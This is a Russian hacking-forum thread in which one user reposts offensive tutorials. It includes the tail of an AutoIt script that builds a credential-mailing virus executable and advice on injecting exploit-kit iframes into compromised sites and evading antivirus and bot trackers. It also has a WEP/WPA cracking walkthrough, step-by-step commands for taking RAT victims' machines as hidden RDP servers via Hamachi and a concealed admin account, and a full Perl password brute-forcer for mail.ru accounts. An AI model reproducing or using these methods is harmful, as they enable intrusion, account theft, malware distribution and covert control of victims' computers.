$to=GUICtrlRead($Input3) ; считываем введённые данные в третье поле,которое отвечает за почтовый адрес получателя и записываем его в переменную $to
$port=GUICtrlRead($Input4) ; считываем введённые данные в четвёртое поле,которое отвечает за порт почтового сервера отправителя.
;StringSplit ( "string", "delimiters" [, flag ] ) - Разделить строку на подстроки, используя указанный разделитель.

;Параметры
;string - Исходная строка.
;delimiters - Один или несколько символов используемых в качестве разделителя.
;[flag] - Если flag равен 0 (стандартное значение), то каждый символ строки delimiters разделяет ее на части. Если flag равен 1, то только вся комбинация delimiters делит строку на части.

$strok=StringSplit($from,"@") ; разбиваем почтовый адрес отправителя на две части,что бы извлечь сервер и логин от этого адреса.
$server="smtp."&$strok[2] ; записываем в переменную $server вторую часть от почтового адреса отправителя и дописываем к началу этой части "smtp.",для того что бы получить smtp сервер от почтового адреса отправителя.
$login=$strok[1] ; вписываем в переменную $login первую часть от почтового адреса отправителя,что бы получить логин,хотя можно просто указать адрес отправителя.
$file=FileOpen($stel&"\source.au3") ; открываем наш скрипт вируса
sleep(1000) ; так на всякий случай небольшая пауза в одну секунду

;FileRead ( filehandle или "filename" [, count] ) - Вернуть указанное число символов из ранее открытого текстового файла.

;Параметры
;filehandle - Указатель файла, полученный при выполнении FileOpen. Либо просто строка с названием файла.
;count - [Опциональный] Количество символов.

$text = FileRead($file) ;считываем весь скрипт и вносим его в переменную $text

;StringReplace ( "string", "searchstring" или start, "replacestring" [, count [, casesense]] ) - Заменить фрагмент строки.

;Параметры

;string - Исходная строка.
;searchstring - Искомый фрагмент, либо начальная позиция замены.
;replacestring - Строка замены.
;count - (опциональный) Число замен.
глобальная замена - 0 (стандартный режим)
;casesense - (опциональный) Режим учета регистра написания.
;0 = при поиске не учитывать регистр написания (стандартный)
;1 = при поиске учитывать регистр написания

$text = StringReplace($text, "from_e-mail", $from) ; ищем в коде нашего скрипта вируса, "from_e-mail" и заменяем его на записанный в переменную $from адрес отправителя,то же самое проделываем и для остальных переменных.
$text = StringReplace($text, "pass_from", $pass)
$text = StringReplace($text, "to-e-mail", $to)
$text = StringReplace($text, "port_from", $port)
$text = StringReplace($text, "smtp_server", $server)
$text = StringReplace($text, "login_from", $login)
FileClose($file) ; закрываем наш скрипт
$file1=FileOpen($stel&"\script.au3",2) ; открываем второй скрипт,хотя можно внести изменения в тот скрипт и обойтись без создания второго скрипта.
FileWrite($file1, $text); и вписываем в него содержимое переменной $text
FileClose($file1) ; закрываем этот скрипт,тем самым сохраняем его.
sleep(1000); чисто символическая пауза,что бы дать сохранить скрипт.

;Run ( "filename" [, "workingdir" [, flag[, Standard_I/O_Flag]]] ) - Запустить внешнее приложение.

;Параметры
;filename - Название файла приложения (EXE, BAT, COM или PIF).
;workingdir - (опциональный) Рабочий директорий.
;flag - [опциональный] Состояние окна приложения после запуска:

;@SW_HIDE = скрыть окно
;@SW_MINIMIZE = свернуть окно
;@SW_MAXIMIZE = развернуть окно

;Standard_I/O_Flag - [опциональный] Предоставить рабочий внутренний идентификатор одного и более из стандартных потоков ввода-вывода дочернего процесса.
  ;1 ($STDIN_CHILD) - внутренний идентификатор STDIN потока
  ;2 ($STDOUT_CHILD) = внутренний идентификатор STDOUT потока
  ;4 ($STDERR_CHILD) = внутренний идентификатор STDERR потока

Run($stel&"\Aut2exe.exe /in " &$stel&"\script.au3 /out " &@ScriptDir & "\virus.exe /icon " & $stel&"\ico.ico /comp 0 /pack") ; запускаем компилятор Autoit,который ранее был выгружен с нашего архива и надоится в той же папке что и скрипт вируса.
;Запускаем его с необходимыми для компилирования параметрами:
;параметр /in - указывает на местоположение скрипта который необходимо скомпилировать
;Параметр /out - указывает на место куда будет сохранён скомпилированный скрипт,то есть куда будет создан сам вирус
;Параметр /icon - указывает на иконку которая будет цепляться к файлу.
;параметр /comp так понял указывает на компрессию файла,хотя в полне могу и ошибаться.
;Параметр /pack указывает на то что файл необходимо сжать.
sleep(90); чисто символическая пауза
msgbox(0,"Info","Virus create Success") ; и сообщаем пользователю что вирус типа создан
EndSwitch
WEnd

 

[ogggi]

это все ваше? авторское?

 

[Rogge]

это все ваше? авторское?

Ну конечно же нет.
Мне кажется человек за свою жизнь сам все не напишет столько.

 

[ogggi]

Ну конечно же нет.
Мне кажется человек за свою жизнь сам все не напишет столько.

к чему тогда тут профикопипаста?

и автора как бы указать надо бы

 

[Rogge]

Откуда я беру там не указан автор так бы указывал бы.
Это инфа у меня в компе уже довно качал.

 

[Rogge]

И что теперь.
Если я что то тут буду покупать или продовать то буду работать только через гаранта!
Если хотите я даже у себя подпись напишу чтоб не у кого позрение вызывать я напишу что если что то продаю или покупаю то только работаю через гарнта

 

[Rogge]

Немого про: связки, трафик и ботов

Я хочу рассказать, о некоторых не очевидных моментах работы, которые частично вы уже могли видеть в бурж-инете.

ТРАФФИК

Сейчас трафф, в большинстве своем,довольно быстрый.
Что это значит... Что юзер серфит по сети. открывая колесом по 10 вкладок, и потом за минуту закрывает 9 из них, на ненужные вкладки он тратит по 2-3 сек.
Значит у нас есть 2-3 сек чтобы загрузить страницу, загрузить ифрейм, пробить, посчетать как пробитого.
Если вы поставите на доимый сайт GA, и посмотрите сколько было просмотров длительностью меньше секунды, то неприятно удивитесь. На поисковом трафе их под 30%. На поп-ап трафе таких просмотров под 90% (вот ж *?№%#). Стоп, а почему меньше секунды? потому что гугл-аналитика тяжелая, и сама грузится не раньше 2й секунды(
Таким образом, у нас есть 2 способа повышения числа слитых (пока только слитых) юзеров.
1) Пробить его как можно скорее.
2) затормозить юзера.

1) Ускоряем пробив.
Многие траферы любят прятать ифрейм в скрипте счетчиков... в подвале 0_о Счетчики туда спецом сносят, чтобы они загружались последними.
Нам нужно создавать ифрейм как можно раньше. В хедере не годится, потому что сделать .append() ифрейма в хедер мы не можем (не загрузится ифрейм), а боди в момент выполнения скрипта еще не существует в DOM'е.
Нельзя вешать создание ифрейма на $(document).ready() и тем-более на body.onload. Если сравнивать сколько юзеров смотрело страницу, и сколько отметилось на связке, потери трафа составят где-то 30%.
Самый разумный вариант - ставить ифрейм, или запускать скрипт, который его создает, после открывающего <body>, поближе к нему.
Например даже так: <body onmouseover="make_bad_thing()">, где make_bad_thing() - функа, создающая ифрейм, и заранее определенная где-то в шапке (зашитая в 1 из ранее существующих js-файлов например). И не забываем за собой файлы тачить.
Если сайт сам тяжелый и медленный (например вордпрессы, напичканые модулями), то возможно придется немного оптимизировать сайт за админа.
Если jQuery грузится с доимого сайта, инклудим его с google-cdn. Не факт что оттуда быстрее, но очень часто он есть в кеше юзера.
Собираем стили в начало хедера, скрипты за ними. Между собой скрипты и стили не перемежаем. Тогда и те и другие грузятся параллельно.
Это не фантазии, если есть возможность (не спалят) это стоит делать на каждом сайте, который мы фреймим руками. Это реально дает прирост трафа на ~9% в среднем, а времени тратится минута.

2) Тормозим юзера.
Тут нет вариантов. Серьезно. Кроме js-воркеров, мы ничем не можем заставить браузер догружать наше зло после закрытия вкладки. А они адекватно поддерживаются только хромом =3
За фокусы с onBeforeUnload сразу получим по шапке. Конечено, если мы фреймим листы автоматом, и долгожительство нам не нужно, то можно и побаловаться, но это убивает ифрейм после первого визита админа.


Код:
<script>
function closeIt() {
window.open(window.location.src,'mywindow');
}
window.onbeforeunload = closeIt;
</script>

Если есть возможность спрятаться глубоко и в размере кода мы не ограничены, то лучше сразу сливать только нужный нам трафф, например IE и FF.
Cпособ не совсем изящный, но отлично отсеивает всякую ересь:

Код:
<script type="text/javascript">
var isMSIE = /*@cc_on!@*/false;
var isFF = window.sidebar;
if (isMSIE || isFF) document.write('<iframe src="#" frameborder="0"></iframe>');
</script>

СВЯЗКИ

Аксиома: 99% связок на рынке - одинаковый набор сплойтов из метасплойта.
Так почему же пробив разный 0_о
Зависит от:
1) скорости выдачи сплойтов
2) кривости проверки на наличие нужного плагина
3) стабильности шелл-кода
4) чистоты связки, ее закрытости от ботов.

Так уж исторически сложилось, что 90% связочников борятся с одной проблемой - поскорее впихнуть дефалтный шелл-код юзеру. Тут все средства хороши.
проверка на пдф? зачем это? отдаем так, яж потестил, пробив так выше. *рука-лицо*
Вобщем-то, проверка на наличие плагина сама-по-себе не критична, потому что например на флеш проверка сложная (если захватывать древние версии)
Но блин, нельзя же отдавать сплойт первому встречному...
О реверсерах мы не беспокоимся (приватных сплойтов то нету). И по-этому любая история о реверсе связки начинается с "открываем малзилу, скачиваем".
Но вот о ботах стоит побеспокоится.
1) чего почему-то не делает ни 1 автор связки, из всех что я видел. Всегда отдавать 404й хедер. Это элементарное и действенное средство от индексации поисковиками, и защита от большинства сканеров.
2) принимать только нужный трафф. Тоску навивают пробитые линуха в скринах статы блек-хола. (еще до добавления в нее java rhino, там регулярно светились пробитые линуха, неизвестные мазилы, вин-сервера, и маки. Ну как так?)

Почему фильтровать трафф не выгодно авторам связок:
1) Теряются те копейки пробива, на которых балансирует конкурентность их продукта. (не выгодно фильтровать юзеров)
2) Чистки стоят денег. Старайтесь не пользоваться связками, где за каждую чистку платите вы. Т.к. палево становится выгодно автору, и вы будете чистить снова и снова. Увы, это реальность.(не выгодно фильтровать ботов)

Почему из-за проверок теряется трафф:
Не забываем что львиная доля трафа сидит на сайте по 1-3 сек. А значит примерно на моменте загрузки связки уже половина инертного трафа закрывает окно. И именно на экономии загрузки полусекунды от plugindetect.js (весит много, многими используется) мы можем получить прирост в 2-3% пробива.

Что полезно сделать перед покупкой связки? Запустить виртуалку, поставить фф по-старее, фаербаг, и загрузить тестовый линк. Если вся связка грузится дольше чем 3 сек - вы будете терять минимум 20% трафа только потому, что трафф раньше уйдет, чем успеет пробиться.

Если вы дозрели до написания своей связки, то позаботьтесь о проверках на соответствие юзер-агента заявленым фичам (тоесть браузер - действительно браузер, а не wget, не phantomJS, не malzilla и не гугл-бот)
Пускать ли на связку носителей fir***g'а - дело ваше, я пускаю, но в нем связки не видно. (прохождение через отладчики - тема отдельной статьи, которая врятли появится в ближайшее время)
Позаботьтесь о том, чтобы исходник страницы со связкой выглядел безобидно, чтобы не создавать проблемы тем, что льет трафф с бирж.
Ну и главное - следите за временем загрузки. Совсем необязательно каждого уника писать в базу. Если самый тяжелый участок у вас geoIp-база, то посмотрите в сторону google location api.
Если вы неуверены в хостинге, и не знаете как он поведет себя при больших нагрузках, то ведите учет времени загрузки страницы на стороне юзера (тоесть в хедере запоминаем микротайм, по body.onload фиксируем разницу). Это поможет вам избежать неприятных вопросов от клиентов а-ля "где мой трафф-то? небось отбираешь?".

БОТЫ & БЛЕКИ

Итак, давайте смотреть, когда падает крипт?

1) когда запален другой файл, криптованый так же
2) когда файл запущен у юзера с ав, очередь на файлы с низким рейтингом доверия у ав (например каспер, комодо, все кто "облачные") дошла до вашего файла.
3) Бот пришел на связку, разобрал крипт js. (тут мы получаем палево шелл-кода, палево нагрузки, блек на домен)

Что делать:
1) Когда купили крипт, положите файлик на полку дня на 3, и не лейте его. Если криптер не ****** то криптованый "вам" файл должен не палиться вечно, пока вы не начнете его грузить. Реальность же такова, что у хороших криптеров он не палится недели две, у плохих - 1-3 дня.
Крипт не у всех "одинаково-полиморфный". У кого-то мутация от билда к билду больше, у кого-то меньше.
2) Выход - хороший лодер. Другой вариант - не грузить вообще, если у юзера нашелся касперски-бар для ие, или что-то подобное.
SSL на домене со связкой был бы выходом, если бы не мучительно долгий хенд-шейк (это когда браузер пишет в статус-баре "Установка безопасного соединения"). Ускорением ssl-хенд-шейка занимается только хром, но мы простые смертные, и он нам не интересен.
3) Детектить ботов, как хотите. Тут фантазия, и все карты в руки. Экзотический довесок - проверять на наличие в кеше у юзера чего-нибудь из google-cdn (jquery например). Определяется по времени загрузки оного. Если грузится меньше чем за 150мс, то точно из кеша. Почему это работает - потому что боты страются приходить девственно-чистыми, без кук, без флеш-кук, без кеша.

Когда админка попадает в трекер?
- Когда до семпла, отосланного в облако антивирусом юзера, доходит очередь у ав. Семпл разбирается, админка вынимается. В нее стучится бот, проверяет, жива ли админка, и не ошибся ли он. Если жива - в трекер, домен в блек.
Попадание в трекер - причина палева, или следствие?
- Следствие. Бесполезно бороться с самими трекерами. Нужно прятать линк админки в билде, и вести учет ботов.
В среднем 80% ботов всегда стучатся с 1го диапозона ip, еще 16% - с 2х диапозонов ip, и 4% - с 3 разных диапозонов ip (стата исключительно по моим замерам, конечно же она плавает).
Если вы кодите, то допишите себе учет адресов, с которых отстукивают боты, и увидите, что перед попаданием в трекер к вам приходит "новенький" (при том, что вы не грузили) или "ваш" стучит хpен-знает-откуда.

Боты никогда не должны стучать с диапозонов ip, отданых хостерам (что логично). Листы адресов, отданных провайдерам, хостерам, и организациям, в том или ином виде, есть в сети. Огромнейший список использует nerowolfe в своем фильтре.
Если ваш бот на основе зевса, то он так или иначе несет на себе тяжкое наследство плохого крипта урла админки. Лучшие подвижки в решении этой проблемы наблюдаются у авторов цитадели.

Чем раньше отсекать ав-ботов, тем лучше. В идеале, отсекать их еще при обращении к днс (для этого придется поднять свои нс-сервера, хорошо поколдовать над ними, и не забыть прописать их в домене админки).

Самый радикальный (и самый надежный) вариант решения проблемы - чтобы только боты знали к какому хосту относится домен админки ( прописывать адрес админки в hosts, использование ботами своих днс).
Тоесть для всех смертных у домена a-запись ведет в наш анти-ав-ханипот (или домен вообще нам не принадлежит вовсе 0_о )
Боты же используют наш (или купленый у Неровульфа %) ) днс. Таким образом только наш днс (или только конкретный пк) знает, на какой хост стучаться.
Кроме того, в случае использования своих днс, мы решаем проблему домена (он нам вообще не нужен. Только наш днс и хост админки знают что microsoft.com - это про них)), и решаем проблему абуз на хост (он за минуту меняется)

 

[Rogge]

Добавил подписку чтоб не у кого не было подозрений.

 

[Rogge]

(wifi) взлом вафли , самые простые способы

итак уважаемый читатель в этой статье я хочу рассказать об наиболее легких способах похекать wifi так как делал это очень часто то естественно уже успел набить шишки и набрался опыта то буду описывать именно рабочие способы

для начала все-же придеться установить себе aircrack-ng данная тулза может многое но есть одно но ее юзать очень неудобно даже не из-за того что она консольная а из-за того что приходиться несколько раз повторять одно и то-же действие а этот момент в ней не автоматизирован

ну начну пожалуй по порядку и для начала стоит отметить тот факт что если среди пойманной вафли имееться AP (access point - точка доступа) с WEP шифрованием то выбирать стоит именно ее ибо взлом такого типа шифрования производиться на основе векторов инициализации тоесть достаточно собрать последних более 10-15 кило и веп наш а вот с WPA дело обстоит сложнее для хека такой вафли надо поймать хэндшейк (handshake) который передаеться во время аутенфикации компа в роутере и затем его брутить вся сложность заключаеться в том что его не так-уж легко поймать а во вторых брутить на cpu это слишком долго а хороший GPU есть не у всех


итак еперь приступим к самому взлому для этого установим себе macchanger он нам еще как понадобиться а дальше все зависит от ваших пожеланий если хотите полуручной режим то ставьте gerix-wifi-cracker а если больше нравиться автоматический режим то стоит воспользоваться замечательной тулзой wifite

wifite

линк на скачку gerix-wifi-cracker можно найти тут

для начала посмотрите видео и почитайте коменты что я запилил ниже

Backtrack 5 - Automated WEP Cracking with Gerix - YouTube

1) перед началом взлома необходимо переключить ваш адаптер в monitor mode (время 1:30 на видео)
2) желательно сменить мак адрес на рандомный (кнопка рядом с той на которую тыкнули в перврм пункте)
3) выбираем интерфейс который в monitor mode (время 1:42 на видео)
4) сканим что у нас доступно из жертв (1:52 по видео на это время прога может подвиснуть так-что не пугайтесь)
5) появиться список с доступными АР и мы видим какой тип шифрования у потенциальных жертв где и требуеться выбрать жертву (в данном случае выберем веп)
6) теперь важный момент не забудьте включить сниффинг (время 2:22) запуститься airodump-ng
7) дальше автор видео полез непосредственно к взлому так как он вкурсе что вафля ваще без всяких признаков защиты (привязка по mac и проч отсутствует) но вам следует жамкнуть на кнопку ниже в результате пойдет тест и если в открывшейся консоли все гуд тогда можно приступать к взлому иначе без шансов только зря убьете время (тест можно проводить и не один раз но надо)
8) по своему опыту пришел к выводу (мб ошибочному но хз) что лучше всего прокатывают chop-chop и fragmentation виды атак
9) время 2:44 показана вкладка для проведения этих 2-х типов атак какую выберете вы ваше дело
10) время 3:22 для успешой атаки должна проканать фейковая аутенфикация постольку поскольку тулза не умеет правильно определять прошел-ли этот этап правильно рекомендую в течение 2-х минут с интервалом секунд 7-10 пожамкать только эту кнопку
11) время 3:30 жмем кнопку что ниже и ждем результата тоесть в консоли которая откроеться вас попросят подтвердить что атаковать нужно именно выбранным пакетом так что пишем там "y" и жамкаем на энтер
12) время 3:44 в реальных боевых условиях времени пройдет немного больше чем на видео и резкльтат не обязательно будет положительным тут всего 2 варианта если пишет что все гуд то жмем следующую кнопку если нет то возвращаемся к пункту 10
13) время 3:50 жмем кнопку (инжектить созданный пакет) и смотрим за происходящим
14) время 3:54 опять-таки подтверждаем выбор пакета для инжекта
15) время 3:56 обратите внимание на то что происходит в той консоли которая на видео в самом верху (где идет сниффинг) там есть куча полей но нас интересует поле data именно это и есть количество векторов инициализации и чем их больше тем быстрее произойдет взлом (если из меньше 10 кило то даже и не пытайтесь ломать)
16) время 6:15 открыта вкладка с которой осуществляеться сам взлом
17) время 6:23 автор останавливает инжект но этого делать не стоит ибо если вам не хватит векторов то будете е*цца заново вместо того что-б повторно запустит взлом
18) время 6:31 производим взлом
19 ) время 6:39 без коментариев

для проведения chop-chop атаки действия полностью аналогичны только проводяться на верхних 4-х кнопках

теперь коснемся взлома впа (WPA) тут так просто все не прокатит как с вепом но ближе к делу , суть атаки как вы уже знаете поймать хэндшейк но не ждать-же когда жертва переподключиться к роутеру сама поэтому мы ей поможем в этом нелегком деле для этого будем слать ей деаутенфикационные пакеты и в перерывах между такими "бонусами" будем ловит хэндшейк

вот собсна видос :
WPA cracking with GERIX in 3 minutes - YouTube

то что уже коментил в видео по вепу коментить не буду поэтому сразу к делу

1) время 1:06 жамкаем как на видео дабы появился сак адрес жертвы (можно вводить и вручную но в лом-же)
2)время 1:24 жмем кнопку деаутенфицировать клиента с перерывами в 10-15 секунд до того момента пока в консоли где отображаеться ход сниффинга не появиться надпись что хэндшейк у нас (как на видео 1:32 )
3) далее надо брутить и тут всего 2 варианта 1) так как это делает автор (зае*тесь ждать) либо заюзать GPU брут (pyrit) для этого ищем куда соххранился хэндшейк и загоняем его в пурит

что-б все было как на видео то перед запуском переводим наш адаптер в monitor mode при помощи airmon-ng

если вафля у вас висит на wlan0 что чаще всего так то :
Код:
airmon-ng start wlan0
и теперь смотрим на видео время 0:16 в самой верхней менюхе (гуи интерфейса естественно) должен быть выбран именно созданный интерфейс который в монитор моде

далее в настройках все должно быть понятно но поясню один нюанс лучше всего поставить галку напротив пункта "select targets from list" это сделать стоит для того что-бы видеть у каких АР есть клиент ибо например атаковать WPA без клиента = дохлый номер

время 0:28 запуск произведен еще немного внимания и все будет готово ...

на этапе поиска лучше не спешить ибо клиентов палит очень медленно а это как вы уже знаете нужный момент и когда сканирование завершено жмем ctrl+c что-б увидеть список жертв

время 1:10 собсна пора выбирать жертву , интерфейс интуитивно понятен поэтому без коментов

дальше все попрет само так как автор видео выбрал впа то после поимки хэндшейка тулза сама попытаеться расколоть его через pyrit а если его нет то запустит простой брут

что касаеться взлома вепа через этот софт то скажу одно если софтине не удалось провести фейковую аутенфикацию (она вам об этом скажет) то не ебите ежа хекайте либо другую вафлю либо перезапустите софт

 

[yuhop]

Полезная инфа=спору нет, пусть даже и копипаст!
Немного коробит от Вашей (не в статьях конечно) орфографии, даже в подписи!, а так есть с чем ознакомится.
П.С. Пишу очень редко, но тут не удержался, глядя на нападки на Вас.
А по поводу Демона-по моему не стоит сравнивать откровенно бессмысленные посты с полезной информацией... ИМХО...

 

[Rogge]

Полезная инфа=спору нет, пусть даже и копипаст!
Немного коробит от Вашей (не в статьях конечно) орфографии, даже в подписи!, а так есть с чем ознакомится.
П.С. Пишу очень редко, но тут не удержался, глядя на нападки на Вас.
А по поводу Демона-по моему не стоит сравнивать откровенно бессмысленные посты с полезной информацией... ИМХО...

А где вы увидели ошибку в подписи?
Если в этих статьях есть ошибки то я не причем не я ведь их писал.

 

[Rogge]

Грамматических ошибок к примеру я не вижу (что что то-не в счёт),но на мысли наводит определённые.

Вы про то что я сейчас набиваю посты чтоб потом тут кого нибудь кинуть?

 

[Rogge]

Как правило я мыслю более широко.

Ну если вы про то что я сейчас набиваю посты чтоб потом кого то кинуть
То мне все ровно запрещено продавать что либо на ДМ.

 

[Rogge]

Дедик Win7 SP1 за NAT-том

Бывает ситуация что по каким-либо причинам вам нужен, дедик или удаленный доступ к какому либо компьютеру находящимся за NAT.
Конечно можно купить этот доступ у селлеров.
Но я тебе предлагаю небольшими усилиями получить достаточное кол-во доступов за небольшие деньги.

Данная статья рассчитана если у жертвы стоит версия windows 7 pro SP1 и выше на Админские права



Итак приступим

Инструменты:
-CyberGate_v1.07.0- думаю не нужно объяснять что это и как этим пользоваться
-Крипт- можно заплатить или закриптовать пабликом, на небольшое время хватит.
-загрузки Купить загрузки на нужный тебе регион. Здесь придется заплатить.
-hamachi качаем отсюда https://secure.logmein.com/hamachi.msi
-Windows 7 SP1 RDP hack качаем здесь

Прямые руки, и немного мозги



1 Настроим CyberGate_v1.07.0 здесь писать нечего информации в сети хватает

2 Крипт можно купить или использовать паблик

3 Загрузки тоже покупаются

4 hamachi
Подготавливаем hamachi устанавливаем на своем компьютере, заходим и создаем сеть
1.JPG

Запоминаем имя и пароль сети

После этого закрываем хамачи. И останавливаем службу «LogMeIn Hamachi Tunneling Engine»

Далее идем в папку с конфигами
Настройки Hamachi2 хранит здесь: C:\Windows\System32\config\systemprofile\AppData\L ocal\
2.JPG

Переименовываем папку LogMeIn Hamachi в LogMeIn Hamachi----srv конфиг админа сети hamachi.


Позаботимся о клиентской части.

После этого заново запускаем службу LogMeIn Hamachi Tunneling Engine запускаем сам Hamachi
Вводим имя компьютера test1 (по выбору какое больше нравиться)
3.JPG

Next

Выбираем пункт “подключиться к существующей сети”
Вводим логин и пас который записали.

4.JPG

Входим в сеть

закрываем Hamachi, останавливаем службу «LogMeIn Hamachi Tunneling Engine»
Идем в папку
C:\Windows\System32\config\systemprofile\AppData\L ocal\
И видим там созданную папку LogMeIn Hamachi это конфиг нашего клиента, вырезаем его в отдельную папку на рабочем столе (для примера test1) это то что мы будем заливать жертве.


Для каждой жертвы нужно делать свой конфиг.

Возвращаем на место LogMeIn Hamachi----srv в LogMeIn Hamachi. Запускаем службу «LogMeIn Hamachi Tunneling Engine» открываем Hamachi мы видим конфиги хозяина сети

С подготовкой Hamachi закончили.

5
Качаем Windows7_SP1_RDPhack и распаковываем в test1
5.JPG

Это минимум который нам нужна залить жертве.

А теперь самое интересное , думаю ты уже догадался что будет дальше
Ты впарил RAT, или купил загрузки и вот пошли отстуки. Выбираем себе жертву.

Не буду вдаваться в подробности пользованием CyberGate но нам нужны только 2 функции: файловый менеджер, и DOS Prompt

Заливаем содержимое папки test1 к жертве в c:\1\

Половина дела сделано 

С этого момента можно обойтись функцией DOS Prompt


Команды

Создаем папку для конфигов hamachi
mkdir "C:\Windows\System32\config\systemprofile\AppData\ Local\LogMeIn Hamachi"

копируем конфиги в папку
copy "C:\1\LogMeIn Hamachi\*.*" "C:\Windows\System32\config\systemprofile\AppData\ Local\LogMeIn Hamachi"

Устанавливаем в автоматическом режиме Hamachi
C:\1\hamachi.msi /quiet

Тут есть небольшая проблема жертвы появляется такое нехорошее сообщение

Как это обойти пока не думал.

ждем отстук в хамачи что клиент в сети

Подчищаем следы удаляем в
C:\Documents and Settings\All Users\Start Menu\Программы\
папку LogMeIn Hamachi
файл C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe

Если все ок вы с жертвой в одной сети, можно поставить Radmin Сокс и радоваться, но вы идем дальше мы не хотим делить один рабочий стол, с жертвой

Создаем себе пользователя
net user xakep qwerty /add

xakep –имя пользователя
qwerty- пароль



Добавляем привилегий.
net localgroup Администраторы xakep /add
net localgroup "Пользователи удаленного рабочего стола" xakep /add

Хочу обратить внимание на один момент что названия групп зависит от языка системы могут быть и на английском
Убираем необходимость смены пароля
net accounts /maxpwage:unlimited

и скрываем пользователя при входе в систему
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v xakep /t REG_DWORD /d "00000000" /f

Пользователь с правами админа и удаленного рабочего стола у нас есть, займемся патчем.
Запускаем в DOS Prompt

C:\1\Windows7_SP1_RDPhack\install.cmd multi

Дальше нам нужно отключить брендмауер или добавить исключения на порт 3389 из подсети Hamachi, эту информацию найдете в Интернете .



Осталось перезагрузить жертву подождать когда будет отстук в hamachi
Логинимся по RDP к жертве логин xakep пароль qwerty


Что планирую сделать
Скрыть сообщения с выбором новой сети при установки hamachi
Скрыть от пользователя отображения нового сетевого подключения.
Запихать это все в один установщик

В данной статье не рассматривалось срабатывания антивируса на патч
Статья подготовлена исключительно в образовательных целях.

 

[Rogge]

Взломать аккаунт на mail.ru довольно просто, самый простой способ это перебор паролей по словарю)

Данный брут написан на языке Perl поэтому перед тем как читать дальше скачайте и установите Active Perl по адресу ActivePerl is Perl for Windows, Mac, Linux, AIX, HP-UX & Solaris | ActiveState

Сделано? Отлично...
Теперь создайте отдельную папку в которой будем создавать скрипт и создайте в этой папке пустые файлы перечисленные ниже:
brute-mail.txt
mail.txt
pass.txt
log.txt
Теперь в файл mail.txt напишите встолбик адреса мыл на мэил ру которые необходимо ломануть
В файл pass.txt поместите словарь для брута - в столбик слова или цифры по которым будем подбирать.

Теперь в этой же папке создайте пустой текстовый файл и поместите в него код написанный ниже:

Код:

#!/usr/bin/perl 
 
use LWP::UserAgent; 
 
print "########## GeNoM- mail.ru bruter v 1.3 ###############\n"; 
 
my $ua = LWP::UserAgent->new( 
max_size => 1024, 
agent => 'kakep brayzer v 9.1.1', 
timeout => 30, 
); 
 
 
 
$set=0; 
$setall=0; 
open email, "<mail.txt"; # в кавычках имя файла в котором будут хранится брутаемые мыла 
$setting=20; # в начале строки стоит значение 30 оно означает через сколько проверенных паролей 
# вы получите инфу о состоянии брута-- слишком маленькое значение может привести к переполнению 
# видеобуфера так что осторожнее  
 
$time=localtime; 
print "Start brute in $time"; 
 
 
while ($mails=<email>) { 
$mails=~s/\n//; # убираем символ конца строки 
($login,$domain)=split(/\@/,$mails); # разбираем мыло на логин и домен 
if ($log==1){open logg,">>log.txt";print logg "-----Start brute-->$login\@$domain\n";close logg;} 
open pass, "<pass.txt"; # в кавычках указываем имя файла с паролями 
print "\n-----Start brute-->$login\@$domain\n\n";  
open logg,">>log.txt";print logg "\n-----Start brute-->$login\@$domain\n\n";close logg; 
while ($password=<pass>) { 
$password=~s/\n//; # убираем символ конца строки 
 
 
my $req = HTTP::Request->new(POST => 'http://win.mail.ru/cgi-bin/auth'); 
$req->content("page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$password"); 
$req->referer('http://win.mail.ru/cgi-bin/auth'); 
my $res = $ua->request($req); 
$yda4a=$res->as_string; 
    
if ($yda4a=~m/500 Can't connect/==1) {print "$yda4a\n";exit;}         
 
# выводим текущее состояние брута 
if ($set==$setting){$time=localtime;$time=substr($time,4,15);print "Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n";open logg,">>log.txt";$time=localtime;$time=substr($time,4,15);print logg "Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n";close logg;$set=0;} 
 
   
if ($yda4a=~m/checkcookie/==1) {print "For $login\@$domain password->$password\n"; 
open brut, ">>brute-mail.txt";print brut "$login\@$domain password->$password\n";close brut;  
open logg,">>log.txt";print logg "For $login\@$domain password->$password\n";close logg; 
goto nashol;}    
 
$set++;    
$setall++;      
   
} 
 
nashol: 
close pass; 
} 
close email;

Переименуйте этот файл на mail-ru.pl

Все, брутфорс готов!
Двойным щелчком запустите mail-ru.pl и в появившемся окне наблюдайте за ходом бручения.
В файле log.txt будет фиксироваться отчет, а в файле brute-mail.txt будут появляться взломанные мыла.

 

[Rogge]

Как поднять socks 5 сервер Dante

Как можно использовать: ICQ, torrents, Skype, различные западные сервисы, закрытые для русской аудитории (если сервер за пределами) и т.д.

Код:

yum install dante-server

Для debian apt-get install

Открываем файл с настройками: /etc/sockd.conf

Код:

logoutput: /var/log/sockd.log
internal: eth0 port = 1080
external: eth1

clientmethod: none
method: username none

#user.privileged: sockd

#user.notprivileged: sockd

#user.libwrap: sockd

#compatibility: sameport

compatibility: reuseaddr

#connecttimeout: 30

client pass {
from: 192.168.0.0/16 to: 0.0.0.0/0
log: connect error
}

# вместо 192.168.0.0/16 указать свою локальную сеть или конкретный IP в сети

pass {
from: 0.0.0.0/0 to: 0.0.0.0/0
method: username
#log: connect error
}

block {
from: 0.0.0.0/0 to: 0.0.0.0/0
#log: connect error
}
# запрещаем использование socks  с чужих IP

Далее, создаём на сервере пользователя, к примеру ivanov с заданным паролем IvanovPass

Его-то мы и будем использовать в дальнейшем для соединения.
------------------------

Затем, в любом приложении, в котором мы хотим использовать socks прописываем:
IP: 192.168.0.0 (нужно указывать ip вашего сервера)
Port: 1080

Ставим галочку, использовать аутентификацию и
User: Ivanov
Password: IvanovPass

 

[Rogge]

The Bat! Voyager + Miranda + GnuPT

The Bat! Voyager + Miranda + GnuPT

В этой заметке, которая не претендует на гениальность и предназначена для новичков, покажу как можно шифровать свою переписку в Th****, в Mirand'e и PSI. По возможности будем использовать портативные версии всех программ, т.е. The Bat! Voyager + Miranda Portable + PSI Portable + GnuPT Portable. Стоит отметить, что в Bat'e и Mirand'e можно применять внутренние средства для шифрования (о которых тоже скажу), но условимся, что мы параноики и поэтому будем юзать OpenSource.
*****
Запускаем Th**** и создаем для примера 2 почтовых ящика, параметры которых можно взять из «халявы». Настраиваем их в соответствии с рекомендациями используемых почтовых провайдеров. Далее идем в «Свойства > OpenPGP > Выбор версии OpenPGP» и смотрим, что там имеется:

